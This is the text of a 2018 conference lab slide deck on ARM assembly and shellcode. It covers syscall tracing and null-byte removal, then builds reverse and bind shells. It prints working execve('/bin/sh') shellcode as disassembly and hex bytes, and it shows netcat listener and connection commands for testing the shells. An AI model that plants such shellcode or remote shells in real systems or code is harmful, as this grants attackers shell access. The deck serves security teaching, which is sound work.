HITB-v1.0 - Lab: ARM Assembly Shellcode

Lab: ARM Assembly
Shellcode
From Zero to ARM Assembly Bind Shellcode
HITBSecConf2018 - Amsterdam 1
Learning Objectives
• ARM assembly basics • Writing ARM Shellcode
• Registers • System functions
• Most common instructions • Mapping out parameters
• ARM vs. Thumb • Translating to Assembly
• Load and Store • De-Nullification
• Literal Pool • Execve() shell
• PC-relative Addressing • Reverse Shell
• Branches • Bind Shell
Outline – 120 minutes
• ARM assembly basics • Reverse Shell
• 15 – 20 minutes • 3 functions
• Shellcoding steps: execve • For each:
• 10 minutes • 10 minutes exercise
• 5 minutes solution
• Getting ready for practical part
• 5 minutes • Buffer[10]
• Bind Shell
• 3 functions
• 25 minutes exercise
Mobile and Iot bla bla
It‘s getting interesting…
Benefits of Learning ARM Assembly
• Reverse Engineering binaries on…
• Phones?
• Routers?
• Cars?
• Intel x86 is nice but..
• Internet of Things?
• Knowing ARM assembly allows you to
• MACBOOKS?? dig into and have fun with various
• SERVERS?? different device types
Benefits of writing ARM Shellcode
• Writing your own assembly helps you to understand assembly
• How functions work
• How function parameters are handled
• How to translate functions to assembly for any purpose
• Learn it once and know how to write your own variations

• For exploit development and vulnerability research
• You can brag that you can write your own shellcode instead of having to rely on
exploit-db or tools
ARM Assembly Basics
15 – 20 minutes
ARM CPU Features
• RISC (Reduced Instruction Set Computing) processor
• Simplified instruction set
• More registers than in CISC (Complex Instruction Set Computing)
• Load/Store architecture
• No direct operations on memory
• 32-bit ARM mode / 16-bit Thumb mode
• Conditional Execution on almost all instructions (ARM mode only)
• Inline Barrel Shifter
• Word aligned memory access (4 byte aligned)
ARM Architecture and Cores
Arch W Processor Family
ARMv6 32 ARM11
ARM Cortex-M0, ARM Cortex-M0+, ARM Cortex-M1,
ARMv6-M 32
SecurCore SC000
ARMv7-M 32 ARM Cortex-M3, SecurCore SC300
ARMv7E-M 32 ARM Cortex-M4, ARM Cortex-M7
ARM Cortex-R4, ARM Cortex-R5, ARM Cortex-R7, ARM
ARMv7-R 32
Cortex-R8
ARM Cortex-A5, ARM Cortex-A7, ARM Cortex-A8, ARM
ARMv7-A 32 Cortex-A9, ARM Cortex-A12, ARM Cortex-A15, ARM
Cortex-A17
ARMv8-A 32 ARM Cortex-A32
ARM Cortex-A35, ARM Cortex-A53, ARM Cortex-A57, ARM
ARMv8-A 64
Cortex-A72
ARM CPU Registers
Most Common Instructions
Thumb Instructions
• ARM core has two execution states: ARM and Thumb
• Switch state with BX instruction
• Thumb is a 16-bit instruction set
• Other versions: Thumb-2 (16 and 32-bit), ThumbEE
• For us: useful to get rid of NULL bytes in our shellcode
• Most Thumb instructions are executed unconditionally 
Conditional Execution
Load / Store instructions
• ARM is a Load / Store Architecture
• Does not support memory to memory data processing operations
• Must move data values into register before using them
• This isn’t as inefficient as it sounds:
• Load data values from memory into registers
• Process data in registers using a number of data processing instructions
• which are not slowed down by memory access
• Store results from registers out of memory
• Three sets of instructions which interact with main memory:
• Single register data transfer (LDR/STR)
• Block data transfer (LDM/STM)
• Single Data Swap (SWP)
Load / Store Instructions
• Load and Store Word or Byte

• LDR / STR / LDRB / STRB
• Can be executed conditionally ☺

• Syntax:
• <LDR|STR>{<cond>}{<size>} Rd, <address>
Replace X with null-byte
Replace X with null-byte
Store Byte (STRB)
Load Immediate Values…
.section .text
.global _start
_start:
mov r0, #511
bkpt
azeria@labs:~$ as test.s -o test.o

test.s: Assembler messages:
test.s:5: Error: invalid constant (1ff) after fixup
*https://raw.githubusercontent.com/azeria-labs/rotator/master/rotator.py
Load Immediate values
Solution: LDR or Split
Literal Pool
PC-relative Addressing
Branches
Branches
Thumb mode
Shellcoding
How to Shellcode
• Step 1: Figure out the system call that is being invoked
• Step 2: Figure out the number of that system call
• Step 3: Map out parameters of the function
• Step 4: Translate to assembly
• Step 5: Dump disassembly to check for null bytes
• Step 6: Get rid of null bytes  de-nullifying shellcode
• Step 7: Convert shellcode to hex
Step 1: Tracing System calls
azeria@labs:~$ gcc system.c -o system
azeria@labs:~$ strace -h
We want to translate the following -f -- follow forks, -ff -- with output into separate files
code into ARM assembly:
-v -- verbose mode: print unabbreviated argv, stat, termio[s], etc. args
#include <stdio.h> --- snip --
azeria@labs:~$ strace -f -v system
void main(void) --- snip --
{ [pid 4575] execve("/bin/sh", ["/bin/sh"], ["MAIL=/var/mail/pi",
system("/bin/sh"); "SSH_CLIENT=192.168.200.1 42616 2"..., "USER=pi", "SHLVL=1",
"OLDPWD=/home/azeria", "HOME=/home/azeria",
} "XDG_SESSION_COOKIE=34069147acf8a"..., "SSH_TTY=/dev/pts/1",
"LOGNAME=pi", "_=/usr/bin/strace", "TERM=xterm",
"PATH=/usr/local/sbin:/usr/local/"..., "LANG=en_US.UTF-8",
"LS_COLORS=rs=0:di=01;34:ln=01;36"..., "SHELL=/bin/bash",
"EGG=AAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., "LC_ALL=en_US.UTF-8",
"PWD=/home/azeria/", "SSH_CONNECTION=192.168.200.1 426"...]) =
Step 2: Figure out Syscall number
azeria@labs:~$ grep execve /usr/include/arm-linux-gnueabihf/asm/unistd.h

#define __NR_execve (__NR_SYSCALL_BASE+ 11)
Step 3: Mapping out parameters
• execve(*filename, *argv[], *envp[])

• Simplification
• argv = NULL
• envp = NULL
• Simply put:
• execve(*filename, 0, 0)
Step 3: Mapping out Parameters
Structure of an Assembly Program
.section .text
.global _start
_start:
.code 32
<instruction>
<instruction>
.code 16
<thumb instruction>
.ascii “some string”
Step 4: Translate to Assembly
Step 5: Check for Null Bytes
pi@raspberrypi:~$ as execve.s -o execve.o && ld –N execve.o -o execve
pi@raspberrypi:~$ objdump -d ./execve
./execve: file format elf32-littlearm
Disassembly of section .text:
00010054 <_start>:
10054: e28f000c add r0, pc, #12
10058: e3a01000 mov r1, #0
1005c: e3a02000 mov r2, #0
10060: e3a0700b mov r7, #11
10064: ef000000 svc 0x00000000
00010068 <binsh>:
10068: 6e69622f .word 0x6e69622f
1006c: 0068732f .word 0x0068732f
Step 6: De-Nullify
pi@raspberrypi:~/asm $ objdump -d execve_final
execve_final: file format elf32-littlearm

Disassembly of section .text:
00010054 <_start>:
10054: e28f3001 add r3, pc, #1
10058: e12fff13 bx r3
1005c: a002 add r0, pc, #8
1005e: 1a49 subs r1, r1, r1
10060: 1c0a adds r2, r1, #0
10062: 71c2 strb r2, [r0, #7]
10064: 270b movs r7, #11
10066: df01 svc 1
00010068 <binsh>:
10068: 6e69622f .word 0x6e69622f
1006c: 5868732f .word 0x5868732f
Step 7: Hexify
pi@raspberrypi:~$ objcopy -O binary execve_final execve_final.bin
pi@raspberrypi:~$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' execve_final.bin
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x1a\x0a\x1c\xc2\x71\x0b\x27\x01
\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58
Practical Part
Reverse & bind shell
Prepare…
Prepare…
• Get ZIP with templates and slides
From your PI:
$ wget https://azeria-labs.com/downloads/HITB-1.zip
• Solutions:
From your PI:
$ wget https://azeria-labs.com/downloads/HITB-2.zip
Reverse shell
Template
Create Socket
Create Socket
Connect
Connect
STDin, STDout, STDerr
STDin, STDout, STDerr
Spawning shell
Spawning shell
Testing your shellcode
pi@raspberrypi:~$ as reverse.s -o reverse.o && ld -N reverse.o -o reverse
pi@raspberrypi:~$ ./reverse
user@ubuntu:~$ nc -lvvp 4444

Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.72.129] port 4444 [tcp/*] accepted (family 2, sport 45326)
Bind shell
syscall numbers
pi@raspberrypi:~$ cat /usr/include/arm-linux-gnueabihf/asm/unistd.h | grep <…>
#define __NR_socket (__NR_SYSCALL_BASE+281)
#define __NR_bind (__NR_SYSCALL_BASE+282)
#define __NR_listen (__NR_SYSCALL_BASE+284)
#define __NR_accept (__NR_SYSCALL_BASE+285)
#define __NR_dup2 (__NR_SYSCALL_BASE+ 63)
#define __NR_execve (__NR_SYSCALL_BASE+ 11)
Bind Socket to Local Port
Bind Socket to Local Port
Listen for incoming connections
Listen for incoming connections
Accept incoming connections
Accept incoming connections
Test your bind shell
Terminal 1:
pi@raspberrypi:~$ strace -e execve,socket,bind,listen,accept,dup2 ./bind
Terminal 2:
pi@raspberrypi:~ $ netstat -tlpn
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 1058/bind_test
pi@raspberrypi:~ $ netcat -nv 0.0.0.0 4444
Connection to 0.0.0.0 4444 port [tcp/*] succeeded!
The end.
More resources at https://azeria-labs.com
Twitter: @Fox0x01

HITB-v1.0 - Lab: ARM Assembly Shellcode

Uploaded by

HITB-v1.0 - Lab: ARM Assembly Shellcode

Uploaded by

Lab: ARM Assembly

• Learn it once and know how to write your own variations

• Load and Store Word or Byte

• Can be executed conditionally ☺

azeria@labs:~$ as test.s -o test.o

• Step 2: Figure out the number of that system call

• Step 3: Map out parameters of the function

• Step 4: Translate to assembly

• Step 5: Dump disassembly to check for null bytes

• Step 6: Get rid of null bytes  de-nullifying shellcode

• Step 7: Convert shellcode to hex

azeria@labs:~$ grep execve /usr/include/arm-linux-gnueabihf/asm/unistd.h

• execve(filename, argv[], *envp[])

.ascii “some string”

./execve: file format elf32-littlearm

Disassembly of section .text:

execve_final: file format elf32-littlearm

user@ubuntu:~$ nc -lvvp 4444

You might also like